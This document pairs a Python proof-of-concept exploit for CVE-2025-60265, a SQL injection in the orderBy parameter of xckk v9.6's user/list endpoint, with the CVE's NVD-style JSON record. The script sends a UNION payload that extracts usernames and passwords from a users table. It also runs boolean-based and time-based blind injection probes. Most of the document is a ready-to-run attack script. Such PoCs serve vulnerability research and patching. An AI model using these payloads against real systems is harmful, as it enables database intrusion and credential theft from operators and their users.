CVE-2025-60265

# CVE-2025-60265 PoC - xckk v9.6 SQL Injection via orderBy parameter # Target: user/list endpoint # Vulnerability: orderBy parameter is not securely filtered import requests TARGET_URL = "http://target-xckk-host/user/list" # Step 1: Verify the SQL injection vulnerability # Normal request to observe baseline response def test_normal(): params = {"orderBy": "id", "page": "1", "limit": "10"} resp = requests.get(TARGET_URL, params=params) print(f"[Normal] Status: {resp.status_code}, Length: {len(resp.text)}") return resp # Step 2: Inject malicious payload via orderBy parameter # Using UNION-based injection to extract database info def exploit_union(): # Example: orderBy=id UNION SELECT 1,username,password,4 FROM users-- payload = "id UNION SELECT 1,username,password,4 FROM users--" params = {"orderBy": payload, "page": "1", "limit": "10"} resp = requests.get(TARGET_URL, params=params) print(f"[UNION Exploit] Status: {resp.status_code}") print(f"Response: {resp.text[:500]}") return resp # Step 3: Boolean-based blind injection to enumerate data def exploit_blind(): # Test if database name length > 5 payload = "id AND (SELECT LENGTH(database()))>5--" params = {"orderBy": payload, "page": "1", "limit": "10"} resp = requests.get(TARGET_URL, params=params) print(f"[Blind Exploit] Status: {resp.status_code}, Length: {len(resp.text)}") return resp # Step 4: Time-based blind injection def exploit_time(): import time payload = "id AND IF(1=1, SLEEP(3), 0)--" params = {"orderBy": payload, "page": "1", "limit": "10"} start = time.time() resp = requests.get(TARGET_URL, params=params) elapsed = time.time() - start print(f"[Time-based] Elapsed: {elapsed:.2f}s (should be >=3 if vulnerable)") return resp if __name__ == "__main__": test_normal() exploit_union() exploit_blind() exploit_time()

{"cve": {"id": "CVE-2025-60265", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:47.687", "lastModified": "2025-10-16T15:28:09.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In xckk v9.6, there is a SQL injection vulnerability in which the orderBy parameter in user/list is not securely filtered, resulting in a SQL injection vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bestfeng:xckk:9.6:*:*:*:*:*:*:*", "matchCriteriaId": "899D943E-2D17-4659-9A94-83B6CC22A3FF"}]}]}], "references": [{"url": "https://gitee.com/bestfeng/xckk", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/int-ux/report/issues/1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}